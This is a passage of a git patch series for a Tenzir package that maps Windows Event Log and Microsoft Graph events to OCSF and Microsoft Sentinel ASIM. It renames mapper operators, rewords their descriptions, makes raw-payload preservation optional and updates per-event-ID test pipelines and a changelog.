f"{env("TENZIR_INPUTS")}/eid-4688.xml" { read_all } -microsoft::windows::ocsf::map data +microsoft::ocsf::map data ocsf::derive ocsf::cast diff --git a/microsoft/tests/ocsf/eid-4697.tql b/microsoft/tests/ocsf/eid-4697.tql index d34a34c..c110c07 100644 --- a/microsoft/tests/ocsf/eid-4697.tql +++ b/microsoft/tests/ocsf/eid-4697.tql @@ -1,7 +1,7 @@ from_file f"{env("TENZIR_INPUTS")}/eid-4697.xml" { read_all } -microsoft::windows::ocsf::map data +microsoft::ocsf::map data ocsf::derive ocsf::cast diff --git a/microsoft/tests/ocsf/eid-4698.tql b/microsoft/tests/ocsf/eid-4698.tql index db26c7f..1e4cf62 100644 --- a/microsoft/tests/ocsf/eid-4698.tql +++ b/microsoft/tests/ocsf/eid-4698.tql @@ -1,7 +1,7 @@ from_file f"{env("TENZIR_INPUTS")}/eid-4698.xml" { read_all } -microsoft::windows::ocsf::map data +microsoft::ocsf::map data ocsf::derive ocsf::cast diff --git a/microsoft/tests/ocsf/eid-4720.tql b/microsoft/tests/ocsf/eid-4720.tql index 62badee..236a9d4 100644 --- a/microsoft/tests/ocsf/eid-4720.tql +++ b/microsoft/tests/ocsf/eid-4720.tql @@ -1,7 +1,7 @@ from_file f"{env("TENZIR_INPUTS")}/eid-4720.xml" { read_all } -microsoft::windows::ocsf::map data +microsoft::ocsf::map data ocsf::derive ocsf::cast diff --git a/microsoft/tests/ocsf/eid-4722.tql b/microsoft/tests/ocsf/eid-4722.tql index 575469c..e827a02 100644 --- a/microsoft/tests/ocsf/eid-4722.tql +++ b/microsoft/tests/ocsf/eid-4722.tql @@ -1,7 +1,7 @@ from_file f"{env("TENZIR_INPUTS")}/eid-4722.xml" { read_all } -microsoft::windows::ocsf::map data +microsoft::ocsf::map data ocsf::derive ocsf::cast diff --git a/microsoft/tests/ocsf/eid-4725.tql b/microsoft/tests/ocsf/eid-4725.tql index 8a88ccf..11b0dcf 100644 --- a/microsoft/tests/ocsf/eid-4725.tql +++ b/microsoft/tests/ocsf/eid-4725.tql @@ -1,7 +1,7 @@ from_file f"{env("TENZIR_INPUTS")}/eid-4725.xml" { read_all } -microsoft::windows::ocsf::map data +microsoft::ocsf::map data ocsf::derive ocsf::cast diff --git a/microsoft/tests/ocsf/eid-4726.tql b/microsoft/tests/ocsf/eid-4726.tql index e5acbda..496a205 100644 --- a/microsoft/tests/ocsf/eid-4726.tql +++ b/microsoft/tests/ocsf/eid-4726.tql @@ -1,7 +1,7 @@ from_file f"{env("TENZIR_INPUTS")}/eid-4726.xml" { read_all } -microsoft::windows::ocsf::map data +microsoft::ocsf::map data ocsf::derive ocsf::cast diff --git a/microsoft/tests/ocsf/eid-4728.tql b/microsoft/tests/ocsf/eid-4728.tql index 37200b6..f0049af 100644 --- a/microsoft/tests/ocsf/eid-4728.tql +++ b/microsoft/tests/ocsf/eid-4728.tql @@ -1,7 +1,7 @@ from_file f"{env("TENZIR_INPUTS")}/eid-4728.xml" { read_all } -microsoft::windows::ocsf::map data +microsoft::ocsf::map data ocsf::derive ocsf::cast diff --git a/microsoft/tests/ocsf/eid-4730.tql b/microsoft/tests/ocsf/eid-4730.tql index d9e5dc0..39421c2 100644 --- a/microsoft/tests/ocsf/eid-4730.tql +++ b/microsoft/tests/ocsf/eid-4730.tql @@ -1,7 +1,7 @@ from_file f"{env("TENZIR_INPUTS")}/eid-4730.xml" { read_all } -microsoft::windows::ocsf::map data +microsoft::ocsf::map data ocsf::derive ocsf::cast diff --git a/microsoft/tests/ocsf/eid-4732.tql b/microsoft/tests/ocsf/eid-4732.tql index 2a09c65..cd590d5 100644 --- a/microsoft/tests/ocsf/eid-4732.tql +++ b/microsoft/tests/ocsf/eid-4732.tql @@ -1,7 +1,7 @@ from_file f"{env("TENZIR_INPUTS")}/eid-4732.xml" { read_all } -microsoft::windows::ocsf::map data +microsoft::ocsf::map data ocsf::derive ocsf::cast diff --git a/microsoft/tests/ocsf/eid-4769.tql b/microsoft/tests/ocsf/eid-4769.tql index d1edd56..02008ba 100644 --- a/microsoft/tests/ocsf/eid-4769.tql +++ b/microsoft/tests/ocsf/eid-4769.tql @@ -1,7 +1,7 @@ from_file f"{env("TENZIR_INPUTS")}/eid-4769.xml" { read_all } -microsoft::windows::ocsf::map data +microsoft::ocsf::map data ocsf::derive ocsf::cast diff --git a/microsoft/tests/ocsf/eid-4771.tql b/microsoft/tests/ocsf/eid-4771.tql index 7e95dea..8f31e5f 100644 --- a/microsoft/tests/ocsf/eid-4771.tql +++ b/microsoft/tests/ocsf/eid-4771.tql @@ -1,7 +1,7 @@ from_file f"{env("TENZIR_INPUTS")}/eid-4771.xml" { read_all } -microsoft::windows::ocsf::map data +microsoft::ocsf::map data ocsf::derive ocsf::cast diff --git a/microsoft/tests/ocsf/eid-4776.tql b/microsoft/tests/ocsf/eid-4776.tql index 1706383..476b404 100644 --- a/microsoft/tests/ocsf/eid-4776.tql +++ b/microsoft/tests/ocsf/eid-4776.tql @@ -1,7 +1,7 @@ from_file f"{env("TENZIR_INPUTS")}/eid-4776.xml" { read_all } -microsoft::windows::ocsf::map data +microsoft::ocsf::map data ocsf::derive ocsf::cast diff --git a/microsoft/tests/ocsf/eid-5001.tql b/microsoft/tests/ocsf/eid-5001.tql index 8d1ba40..73f76b0 100644 --- a/microsoft/tests/ocsf/eid-5001.tql +++ b/microsoft/tests/ocsf/eid-5001.tql @@ -1,7 +1,7 @@ from_file f"{env("TENZIR_INPUTS")}/eid-5001.xml" { read_all } -microsoft::windows::ocsf::map data +microsoft::ocsf::map data ocsf::derive ocsf::cast diff --git a/microsoft/tests/ocsf/eid-5007.tql b/microsoft/tests/ocsf/eid-5007.tql index fa112bb..8b5a0bd 100644 --- a/microsoft/tests/ocsf/eid-5007.tql +++ b/microsoft/tests/ocsf/eid-5007.tql @@ -1,7 +1,7 @@ from_file f"{env("TENZIR_INPUTS")}/eid-5007.xml" { read_all } -microsoft::windows::ocsf::map data +microsoft::ocsf::map data ocsf::derive ocsf::cast diff --git a/microsoft/tests/ocsf/eid-6005.tql b/microsoft/tests/ocsf/eid-6005.tql index 7e3c533..35ffa6b 100644 --- a/microsoft/tests/ocsf/eid-6005.tql +++ b/microsoft/tests/ocsf/eid-6005.tql @@ -1,7 +1,7 @@ from_file f"{env("TENZIR_INPUTS")}/eid-6005.xml" { read_all } -microsoft::windows::ocsf::map data +microsoft::ocsf::map data ocsf::derive ocsf::cast diff --git a/microsoft/tests/ocsf/eid-6006.tql b/microsoft/tests/ocsf/eid-6006.tql index 6e6e572..4718edd 100644 --- a/microsoft/tests/ocsf/eid-6006.tql +++ b/microsoft/tests/ocsf/eid-6006.tql @@ -1,7 +1,7 @@ from_file f"{env("TENZIR_INPUTS")}/eid-6006.xml" { read_all } -microsoft::windows::ocsf::map data +microsoft::ocsf::map data ocsf::derive ocsf::cast diff --git a/microsoft/tests/ocsf/eid-7034.tql b/microsoft/tests/ocsf/eid-7034.tql index 69ca766..25fb053 100644 --- a/microsoft/tests/ocsf/eid-7034.tql +++ b/microsoft/tests/ocsf/eid-7034.tql @@ -1,7 +1,7 @@ from_file f"{env("TENZIR_INPUTS")}/eid-7034.xml" { read_all } -microsoft::windows::ocsf::map data +microsoft::ocsf::map data ocsf::derive ocsf::cast diff --git a/microsoft/tests/ocsf/eid-7045.tql b/microsoft/tests/ocsf/eid-7045.tql index 9640567..bd899e9 100644 --- a/microsoft/tests/ocsf/eid-7045.tql +++ b/microsoft/tests/ocsf/eid-7045.tql @@ -1,7 +1,7 @@ from_file f"{env("TENZIR_INPUTS")}/eid-7045.xml" { read_all } -microsoft::windows::ocsf::map data +microsoft::ocsf::map data ocsf::derive ocsf::cast diff --git a/microsoft/tests/ocsf/eid-9999.tql b/microsoft/tests/ocsf/eid-9999.tql index 0c28d5f..0aff212 100644 --- a/microsoft/tests/ocsf/eid-9999.tql +++ b/microsoft/tests/ocsf/eid-9999.tql @@ -1,7 +1,7 @@ from_file f"{env("TENZIR_INPUTS")}/eid-9999.xml" { read_all } -microsoft::windows::ocsf::map data +microsoft::ocsf::map data ocsf::derive ocsf::cast From 97657e001cb4e9dd3c2df5fb36652712961cae95 Mon Sep 17 00:00:00 2001 From: Matthias Vallentin Date: Mon, 8 Jun 2026 09:11:32 +0200 Subject: [PATCH 04/27] Clean up Microsoft mapper descriptions Keep the new Microsoft mapping UDO frontmatter within the supported operator schema by using plain descriptions only. Assisted-by: GPT-5 (Codex) --- microsoft/operators/asim/map.tql | 2 +- microsoft/operators/asim/ocsf/account_change.tql | 2 +- microsoft/operators/asim/ocsf/authentication.tql | 2 +- microsoft/operators/asim/ocsf/authorize_session.tql | 2 +- microsoft/operators/asim/ocsf/compliance_finding.tql | 2 +- microsoft/operators/asim/ocsf/detection_finding.tql | 2 +- microsoft/operators/asim/ocsf/dhcp_activity.tql | 2 +- microsoft/operators/asim/ocsf/dns_activity.tql | 2 +- microsoft/operators/asim/ocsf/entity_management.tql | 2 +- microsoft/operators/asim/ocsf/event_log_activity.tql | 2 +- microsoft/operators/asim/ocsf/file_system_activity.tql | 2 +- microsoft/operators/asim/ocsf/group_management.tql | 2 +- microsoft/operators/asim/ocsf/helpers/unsupported.tql | 2 +- microsoft/operators/asim/ocsf/http_activity.tql | 2 +- microsoft/operators/asim/ocsf/map.tql | 2 +- microsoft/operators/asim/ocsf/network_activity.tql | 2 +- microsoft/operators/asim/ocsf/process_activity.tql | 2 +- microsoft/operators/asim/ocsf/scheduled_job_activity.tql | 2 +- microsoft/operators/asim/ocsf/windows_service_activity.tql | 2 +- microsoft/operators/ocsf/map.tql | 2 +- 20 files changed, 20 insertions(+), 20 deletions(-) diff --git a/microsoft/operators/asim/map.tql b/microsoft/operators/asim/map.tql index 93204fc..39b67ec 100644 --- a/microsoft/operators/asim/map.tql +++ b/microsoft/operators/asim/map.tql @@ -1,5 +1,5 @@ --- -description: Microsoft event -> Microsoft Sentinel ASIM event. +description: Maps supported Microsoft events to Microsoft Sentinel ASIM. args: positional: - name: log diff --git a/microsoft/operators/asim/ocsf/account_change.tql b/microsoft/operators/asim/ocsf/account_change.tql index 2d88067..8009444 100644 --- a/microsoft/operators/asim/ocsf/account_change.tql +++ b/microsoft/operators/asim/ocsf/account_change.tql @@ -1,5 +1,5 @@ --- -description: OCSF Account Change event -> Microsoft Sentinel ASIM UserManagement event. +description: Maps OCSF Account Change events to Microsoft Sentinel ASIM UserManagement events. --- microsoft::asim::ocsf::helpers::common diff --git a/microsoft/operators/asim/ocsf/authentication.tql b/microsoft/operators/asim/ocsf/authentication.tql index f0b9d16..57cdf0a 100644 --- a/microsoft/operators/asim/ocsf/authentication.tql +++ b/microsoft/operators/asim/ocsf/authentication.tql @@ -1,5 +1,5 @@ --- -description: OCSF Authentication event -> Microsoft Sentinel ASIM Authentication event. +description: Maps OCSF Authentication events to Microsoft Sentinel ASIM Authentication events. --- microsoft::asim::ocsf::helpers::common diff --git a/microsoft/operators/asim/ocsf/authorize_session.tql b/microsoft/operators/asim/ocsf/authorize_session.tql index 00af6c7..40be37e 100644 --- a/microsoft/operators/asim/ocsf/authorize_session.tql +++ b/microsoft/operators/asim/ocsf/authorize_session.tql @@ -1,5 +1,5 @@ --- -description: OCSF Authorize Session event -> Microsoft Sentinel ASIM Authentication event. +description: Maps OCSF Authorize Session events to Microsoft Sentinel ASIM Authentication events. --- microsoft::asim::ocsf::helpers::common diff --git a/microsoft/operators/asim/ocsf/compliance_finding.tql b/microsoft/operators/asim/ocsf/compliance_finding.tql index 035f6c8..9f95a88 100644 --- a/microsoft/operators/asim/ocsf/compliance_finding.tql +++ b/microsoft/operators/asim/ocsf/compliance_finding.tql @@ -1,5 +1,5 @@ --- -description: OCSF Compliance Finding event -> Microsoft Sentinel ASIM AlertEvent. +description: Maps OCSF Compliance Finding events to Microsoft Sentinel ASIM AlertEvent records. --- microsoft::asim::ocsf::helpers::common diff --git a/microsoft/operators/asim/ocsf/detection_finding.tql b/microsoft/operators/asim/ocsf/detection_finding.tql index cdc8b16..823fe35 100644 --- a/microsoft/operators/asim/ocsf/detection_finding.tql +++ b/microsoft/operators/asim/ocsf/detection_finding.tql @@ -1,5 +1,5 @@ --- -description: OCSF Detection Finding event -> Microsoft Sentinel ASIM AlertEvent. +description: Maps OCSF Detection Finding events to Microsoft Sentinel ASIM AlertEvent records. --- let $threat_categories = { diff --git a/microsoft/operators/asim/ocsf/dhcp_activity.tql b/microsoft/operators/asim/ocsf/dhcp_activity.tql index 2b95d96..835b82b 100644 --- a/microsoft/operators/asim/ocsf/dhcp_activity.tql +++ b/microsoft/operators/asim/ocsf/dhcp_activity.tql @@ -1,5 +1,5 @@ --- -description: OCSF DHCP Activity event -> Microsoft Sentinel ASIM DhcpEvent. +description: Maps OCSF DHCP Activity events to Microsoft Sentinel ASIM DhcpEvent records. --- microsoft::asim::ocsf::helpers::common diff --git a/microsoft/operators/asim/ocsf/dns_activity.tql b/microsoft/operators/asim/ocsf/dns_activity.tql index c84f776..6c346d0 100644 --- a/microsoft/operators/asim/ocsf/dns_activity.tql +++ b/microsoft/operators/asim/ocsf/dns_activity.tql @@ -1,5 +1,5 @@ --- -description: OCSF DNS Activity event -> Microsoft Sentinel ASIM Dns event. +description: Maps OCSF DNS Activity events to Microsoft Sentinel ASIM Dns records. --- microsoft::asim::ocsf::helpers::common diff --git a/microsoft/operators/asim/ocsf/entity_management.tql b/microsoft/operators/asim/ocsf/entity_management.tql index 831ce0d..4ec2bd3 100644 --- a/microsoft/operators/asim/ocsf/entity_management.tql +++ b/microsoft/operators/asim/ocsf/entity_management.tql @@ -1,5 +1,5 @@ --- -description: OCSF Entity Management event -> Microsoft Sentinel ASIM AuditEvent. +description: Maps OCSF Entity Management events to Microsoft Sentinel ASIM AuditEvent records. --- microsoft::asim::ocsf::helpers::common diff --git a/microsoft/operators/asim/ocsf/event_log_activity.tql b/microsoft/operators/asim/ocsf/event_log_activity.tql index 8644640..b764b0e 100644 --- a/microsoft/operators/asim/ocsf/event_log_activity.tql +++ b/microsoft/operators/asim/ocsf/event_log_activity.tql @@ -1,5 +1,5 @@ --- -description: OCSF Event Log Activity event -> Microsoft Sentinel ASIM AuditEvent. +description: Maps OCSF Event Log Activity events to Microsoft Sentinel ASIM AuditEvent records. --- microsoft::asim::ocsf::helpers::common diff --git a/microsoft/operators/asim/ocsf/file_system_activity.tql b/microsoft/operators/asim/ocsf/file_system_activity.tql index c53fb0d..1e17f87 100644 --- a/microsoft/operators/asim/ocsf/file_system_activity.tql +++ b/microsoft/operators/asim/ocsf/file_system_activity.tql @@ -1,5 +1,5 @@ --- -description: OCSF File System Activity event -> Microsoft Sentinel ASIM FileEvent. +description: Maps OCSF File System Activity events to Microsoft Sentinel ASIM FileEvent records. --- microsoft::asim::ocsf::helpers::common diff --git a/microsoft/operators/asim/ocsf/group_management.tql b/microsoft/operators/asim/ocsf/group_management.tql index 5d18efd..8ff4cea 100644 --- a/microsoft/operators/asim/ocsf/group_management.tql +++ b/microsoft/operators/asim/ocsf/group_management.tql @@ -1,5 +1,5 @@ --- -description: OCSF Group Management event -> Microsoft Sentinel ASIM UserManagement event. +description: Maps OCSF Group Management events to Microsoft Sentinel ASIM UserManagement events. --- microsoft::asim::ocsf::helpers::common diff --git a/microsoft/operators/asim/ocsf/helpers/unsupported.tql b/microsoft/operators/asim/ocsf/helpers/unsupported.tql index 9388c7d..9d62845 100644 --- a/microsoft/operators/asim/ocsf/helpers/unsupported.tql +++ b/microsoft/operators/asim/ocsf/helpers/unsupported.tql @@ -1,5 +1,5 @@ --- -description: Drops unsupported OCSF -> ASIM mappings with a warning. +description: Drops unsupported OCSF to ASIM mappings with a warning. --- assert false, message={ diff --git a/microsoft/operators/asim/ocsf/http_activity.tql b/microsoft/operators/asim/ocsf/http_activity.tql index 2a4b1e6..95866cc 100644 --- a/microsoft/operators/asim/ocsf/http_activity.tql +++ b/microsoft/operators/asim/ocsf/http_activity.tql @@ -1,5 +1,5 @@ --- -description: OCSF HTTP Activity event -> Microsoft Sentinel ASIM WebSession. +description: Maps OCSF HTTP Activity events to Microsoft Sentinel ASIM WebSession records. --- microsoft::asim::ocsf::helpers::common diff --git a/microsoft/operators/asim/ocsf/map.tql b/microsoft/operators/asim/ocsf/map.tql index e59945c..3fe08b4 100644 --- a/microsoft/operators/asim/ocsf/map.tql +++ b/microsoft/operators/asim/ocsf/map.tql @@ -1,5 +1,5 @@ --- -description: Validated OCSF 1.8 event -> Microsoft Sentinel ASIM event. +description: Maps validated OCSF 1.8 events to Microsoft Sentinel ASIM. --- match class_uid { diff --git a/microsoft/operators/asim/ocsf/network_activity.tql b/microsoft/operators/asim/ocsf/network_activity.tql index 1077e0f..8836cf6 100644 --- a/microsoft/operators/asim/ocsf/network_activity.tql +++ b/microsoft/operators/asim/ocsf/network_activity.tql @@ -1,5 +1,5 @@ --- -description: OCSF Network Activity event -> Microsoft Sentinel ASIM NetworkSession. +description: Maps OCSF Network Activity events to Microsoft Sentinel ASIM NetworkSession records. --- microsoft::asim::ocsf::helpers::common diff --git a/microsoft/operators/asim/ocsf/process_activity.tql b/microsoft/operators/asim/ocsf/process_activity.tql index 6437521..6143e90 100644 --- a/microsoft/operators/asim/ocsf/process_activity.tql +++ b/microsoft/operators/asim/ocsf/process_activity.tql @@ -1,5 +1,5 @@ --- -description: OCSF Process Activity event -> Microsoft Sentinel ASIM ProcessEvent. +description: Maps OCSF Process Activity events to Microsoft Sentinel ASIM ProcessEvent records. --- microsoft::asim::ocsf::helpers::common diff --git a/microsoft/operators/asim/ocsf/scheduled_job_activity.tql b/microsoft/operators/asim/ocsf/scheduled_job_activity.tql index 09e300d..a32b74e 100644 --- a/microsoft/operators/asim/ocsf/scheduled_job_activity.tql +++ b/microsoft/operators/asim/ocsf/scheduled_job_activity.tql @@ -1,5 +1,5 @@ --- -description: OCSF Scheduled Job Activity event -> Microsoft Sentinel ASIM AuditEvent. +description: Maps OCSF Scheduled Job Activity events to Microsoft Sentinel ASIM AuditEvent records. --- microsoft::asim::ocsf::helpers::common diff --git a/microsoft/operators/asim/ocsf/windows_service_activity.tql b/microsoft/operators/asim/ocsf/windows_service_activity.tql index 0238afc..ec9b967 100644 --- a/microsoft/operators/asim/ocsf/windows_service_activity.tql +++ b/microsoft/operators/asim/ocsf/windows_service_activity.tql @@ -1,5 +1,5 @@ --- -description: OCSF Windows Service Activity event -> Microsoft Sentinel ASIM AuditEvent. +description: Maps OCSF Windows Service Activity events to Microsoft Sentinel ASIM AuditEvent records. --- microsoft::asim::ocsf::helpers::common diff --git a/microsoft/operators/ocsf/map.tql b/microsoft/operators/ocsf/map.tql index c1db810..0c67d69 100644 --- a/microsoft/operators/ocsf/map.tql +++ b/microsoft/operators/ocsf/map.tql @@ -1,5 +1,5 @@ --- -description: Microsoft event -> OCSF. +description: Maps supported Microsoft events to OCSF. args: positional: - name: log From d3ba466db5f812ff69e2318f9d09303d3065c38e Mon Sep 17 00:00:00 2001 From: Matthias Vallentin Date: Mon, 8 Jun 2026 15:57:57 +0200 Subject: [PATCH 05/27] Normalize Microsoft mapper inputs Treat Microsoft OCSF and ASIM dispatchers as current-event mappers and make raw payload preservation optional provenance. Update Windows Event Log tests to parse XML explicitly before mapping and refresh their baselines. Assisted-by: GPT-5 Codex (Superconductor) --- .../unreleased/ocsf-to-asim-mapper.md | 9 ++++++++ .../examples/windows-event-log-to-ocsf.tql | 12 +++++++++++ microsoft/operators/asim/map.tql | 13 ++++-------- microsoft/operators/graph/ocsf/map.tql | 10 +++++++++ microsoft/operators/ocsf/map.tql | 13 ++++++------ microsoft/operators/windows/ocsf/map.tql | 21 ++++++++++--------- microsoft/tests/asim/windows.tql | 3 ++- microsoft/tests/ocsf/eid-0100.tql | 3 ++- microsoft/tests/ocsf/eid-0100.txt | 2 -- microsoft/tests/ocsf/eid-0101.tql | 3 ++- microsoft/tests/ocsf/eid-0101.txt | 2 -- microsoft/tests/ocsf/eid-0102.tql | 3 ++- microsoft/tests/ocsf/eid-0102.txt | 2 -- microsoft/tests/ocsf/eid-0106.tql | 3 ++- microsoft/tests/ocsf/eid-0106.txt | 2 -- microsoft/tests/ocsf/eid-0129.tql | 3 ++- microsoft/tests/ocsf/eid-0129.txt | 2 -- microsoft/tests/ocsf/eid-0140.tql | 3 ++- microsoft/tests/ocsf/eid-0140.txt | 2 -- microsoft/tests/ocsf/eid-0141.tql | 3 ++- microsoft/tests/ocsf/eid-0141.txt | 2 -- microsoft/tests/ocsf/eid-0200.tql | 3 ++- microsoft/tests/ocsf/eid-0200.txt | 2 -- microsoft/tests/ocsf/eid-0201.tql | 3 ++- microsoft/tests/ocsf/eid-0201.txt | 2 -- microsoft/tests/ocsf/eid-1000.tql | 3 ++- microsoft/tests/ocsf/eid-1000.txt | 2 -- microsoft/tests/ocsf/eid-1001.tql | 3 ++- microsoft/tests/ocsf/eid-1001.txt | 2 -- microsoft/tests/ocsf/eid-1002.tql | 3 ++- microsoft/tests/ocsf/eid-1002.txt | 2 -- microsoft/tests/ocsf/eid-1006.tql | 3 ++- microsoft/tests/ocsf/eid-1006.txt | 2 -- microsoft/tests/ocsf/eid-1007.tql | 3 ++- microsoft/tests/ocsf/eid-1007.txt | 2 -- microsoft/tests/ocsf/eid-1102.tql | 3 ++- microsoft/tests/ocsf/eid-1102.txt | 2 -- microsoft/tests/ocsf/eid-1116.tql | 3 ++- microsoft/tests/ocsf/eid-1116.txt | 2 -- microsoft/tests/ocsf/eid-1117.tql | 3 ++- microsoft/tests/ocsf/eid-1117.txt | 2 -- microsoft/tests/ocsf/eid-1121.tql | 3 ++- microsoft/tests/ocsf/eid-1121.txt | 2 -- microsoft/tests/ocsf/eid-2000.tql | 3 ++- microsoft/tests/ocsf/eid-2000.txt | 2 -- microsoft/tests/ocsf/eid-4100.tql | 3 ++- microsoft/tests/ocsf/eid-4100.txt | 2 -- microsoft/tests/ocsf/eid-4103.tql | 3 ++- microsoft/tests/ocsf/eid-4103.txt | 2 -- microsoft/tests/ocsf/eid-4104.tql | 3 ++- microsoft/tests/ocsf/eid-4104.txt | 2 -- microsoft/tests/ocsf/eid-4105.tql | 3 ++- microsoft/tests/ocsf/eid-4105.txt | 2 -- microsoft/tests/ocsf/eid-4106.tql | 3 ++- microsoft/tests/ocsf/eid-4106.txt | 2 -- microsoft/tests/ocsf/eid-4624.tql | 3 ++- microsoft/tests/ocsf/eid-4624.txt | 2 -- microsoft/tests/ocsf/eid-4625.tql | 3 ++- microsoft/tests/ocsf/eid-4625.txt | 2 -- microsoft/tests/ocsf/eid-4648.tql | 3 ++- microsoft/tests/ocsf/eid-4648.txt | 2 -- microsoft/tests/ocsf/eid-4672.tql | 3 ++- microsoft/tests/ocsf/eid-4672.txt | 2 -- microsoft/tests/ocsf/eid-4688.tql | 3 ++- microsoft/tests/ocsf/eid-4688.txt | 2 -- microsoft/tests/ocsf/eid-4697.tql | 3 ++- microsoft/tests/ocsf/eid-4697.txt | 2 -- microsoft/tests/ocsf/eid-4698.tql | 3 ++- microsoft/tests/ocsf/eid-4698.txt | 2 -- microsoft/tests/ocsf/eid-4720.tql | 3 ++- microsoft/tests/ocsf/eid-4720.txt | 2 -- microsoft/tests/ocsf/eid-4722.tql | 3 ++- microsoft/tests/ocsf/eid-4722.txt | 2 -- microsoft/tests/ocsf/eid-4725.tql | 3 ++- microsoft/tests/ocsf/eid-4725.txt | 2 -- microsoft/tests/ocsf/eid-4726.tql | 3 ++- microsoft/tests/ocsf/eid-4726.txt | 2 -- microsoft/tests/ocsf/eid-4728.tql | 3 ++- microsoft/tests/ocsf/eid-4728.txt | 2 -- microsoft/tests/ocsf/eid-4730.tql | 3 ++- microsoft/tests/ocsf/eid-4730.txt | 2 -- microsoft/tests/ocsf/eid-4732.tql | 3 ++- microsoft/tests/ocsf/eid-4732.txt | 2 -- microsoft/tests/ocsf/eid-4769.tql | 3 ++- microsoft/tests/ocsf/eid-4769.txt | 2 -- microsoft/tests/ocsf/eid-4771.tql | 3 ++- microsoft/tests/ocsf/eid-4771.txt | 2 -- microsoft/tests/ocsf/eid-4776.tql | 3 ++- microsoft/tests/ocsf/eid-4776.txt | 2 -- microsoft/tests/ocsf/eid-5001.tql | 3 ++- microsoft/tests/ocsf/eid-5001.txt | 2 -- microsoft/tests/ocsf/eid-5007.tql | 3 ++- microsoft/tests/ocsf/eid-5007.txt | 2 -- microsoft/tests/ocsf/eid-6005.tql | 3 ++- microsoft/tests/ocsf/eid-6005.txt | 2 -- microsoft/tests/ocsf/eid-6006.tql | 3 ++- microsoft/tests/ocsf/eid-6006.txt | 2 -- microsoft/tests/ocsf/eid-7034.tql | 3 ++- microsoft/tests/ocsf/eid-7034.txt | 2 -- microsoft/tests/ocsf/eid-7045.tql | 3 ++- microsoft/tests/ocsf/eid-7045.txt | 2 -- microsoft/tests/ocsf/eid-9999.tql | 3 ++- microsoft/tests/ocsf/eid-9999.txt | 2 -- 103 files changed, 150 insertions(+), 171 deletions(-) create mode 100644 microsoft/examples/windows-event-log-to-ocsf.tql diff --git a/microsoft/changelog/unreleased/ocsf-to-asim-mapper.md b/microsoft/changelog/unreleased/ocsf-to-asim-mapper.md index f0b462d..a59053f 100644 --- a/microsoft/changelog/unreleased/ocsf-to-asim-mapper.md +++ b/microsoft/changelog/unreleased/ocsf-to-asim-mapper.md @@ -4,6 +4,8 @@ type: feature authors: - mavam - codex +prs: + - 153 created: 2026-06-07T00:00:00Z --- @@ -12,6 +14,13 @@ Microsoft events into flat Microsoft Sentinel ASIM event records. The mapper uses the new `microsoft::ocsf::map` entry point and `microsoft::asim::ocsf::map` for validated OCSF 1.8 events. +Microsoft mapping operators now treat the current event as the source event to +map. For raw Windows Event Log XML, first run `this = data.parse_winlog()`; +the resulting structured event can then be normalized through +`microsoft::ocsf::map` or `microsoft::asim::map`. Mapping operators accept an +optional `raw` value when the original source payload is still available and +should be preserved in OCSF `raw_data` and `raw_data_size`. + The mapper covers the Microsoft package's current OCSF authentication, process, audit, user-management, and alert outputs, plus direct OCSF counterparts for file, network, DNS, DHCP, and web session ASIM schemas. The full original OCSF diff --git a/microsoft/examples/windows-event-log-to-ocsf.tql b/microsoft/examples/windows-event-log-to-ocsf.tql new file mode 100644 index 0000000..7970b53 --- /dev/null +++ b/microsoft/examples/windows-event-log-to-ocsf.tql @@ -0,0 +1,12 @@ +--- +name: Windows Event Log XML → OCSF +description: Parse Windows Event Log XML and map the structured event to OCSF. +--- + +from_file "windows-event.xml" { + read_all +} +this = data.parse_winlog() +microsoft::windows::ocsf::map +ocsf::derive +ocsf::cast diff --git a/microsoft/operators/asim/map.tql b/microsoft/operators/asim/map.tql index 39b67ec..81b6bb2 100644 --- a/microsoft/operators/asim/map.tql +++ b/microsoft/operators/asim/map.tql @@ -1,21 +1,16 @@ --- description: Maps supported Microsoft events to Microsoft Sentinel ASIM. args: - positional: - - name: log - description: The field that holds a raw Microsoft event, such as Windows Event Log XML. + named: + - name: raw + description: Raw Microsoft event to preserve in OCSF `raw_data` before ASIM mapping. default: null --- if class_uid? != null { microsoft::asim::ocsf::map } else { - if $log != null { - _microsoft_asim_log = $log - microsoft::ocsf::map _microsoft_asim_log - } else { - microsoft::ocsf::map - } + microsoft::ocsf::map raw=$raw ocsf::derive ocsf::cast microsoft::asim::ocsf::map diff --git a/microsoft/operators/graph/ocsf/map.tql b/microsoft/operators/graph/ocsf/map.tql index 992c381..7838e67 100644 --- a/microsoft/operators/graph/ocsf/map.tql +++ b/microsoft/operators/graph/ocsf/map.tql @@ -1,10 +1,20 @@ --- description: Microsoft Graph → OCSF +args: + named: + - name: raw + description: Raw Microsoft Graph event to preserve in OCSF `raw_data`. + default: null --- this = {graph: this} ocsf = {} +if $raw != null { + ocsf.raw_data = $raw + ocsf.raw_data_size = $raw.length_bytes() +} + ocsf.cloud = { provider: "Azure", } diff --git a/microsoft/operators/ocsf/map.tql b/microsoft/operators/ocsf/map.tql index 0c67d69..004d099 100644 --- a/microsoft/operators/ocsf/map.tql +++ b/microsoft/operators/ocsf/map.tql @@ -1,15 +1,14 @@ --- description: Maps supported Microsoft events to OCSF. args: - positional: - - name: log - description: The field that holds a raw Microsoft event, such as Windows Event Log XML. + named: + - name: raw + description: Raw Microsoft event to preserve in OCSF `raw_data`. default: null --- -if $log != null { - _microsoft_ocsf_log = $log - microsoft::windows::ocsf::map _microsoft_ocsf_log +if @name == "microsoft.windows.eventlog" or System? != null { + microsoft::windows::ocsf::map raw=$raw } else { - microsoft::graph::ocsf::map + microsoft::graph::ocsf::map raw=$raw } diff --git a/microsoft/operators/windows/ocsf/map.tql b/microsoft/operators/windows/ocsf/map.tql index 1a25a06..ac8837f 100644 --- a/microsoft/operators/windows/ocsf/map.tql +++ b/microsoft/operators/windows/ocsf/map.tql @@ -1,18 +1,19 @@ --- -description: Microsoft Windows Event Log → OCSF +description: Structured Microsoft Windows Event Log → OCSF args: - positional: - - name: log - description: The field that holds the raw Windows Event Log event as XML. - type: field + named: + - name: raw + description: Raw Windows Event Log XML to preserve in OCSF `raw_data`. + default: null --- -ocsf = {} - -ocsf.raw_data = $log -ocsf.raw_data_size = $log.length_bytes() +windows = this -windows = $log.parse_winlog() +ocsf = {} +if $raw != null { + ocsf.raw_data = $raw + ocsf.raw_data_size = $raw.length_bytes() +} ocsf.metadata = { event_code: windows.System.EventID.string(), diff --git a/microsoft/tests/asim/windows.tql b/microsoft/tests/asim/windows.tql index a6a7edd..eaa3966 100644 --- a/microsoft/tests/asim/windows.tql +++ b/microsoft/tests/asim/windows.tql @@ -1,7 +1,8 @@ from_file f"{env("TENZIR_INPUTS")}/eid-4624.xml" { read_all } -microsoft::asim::map data 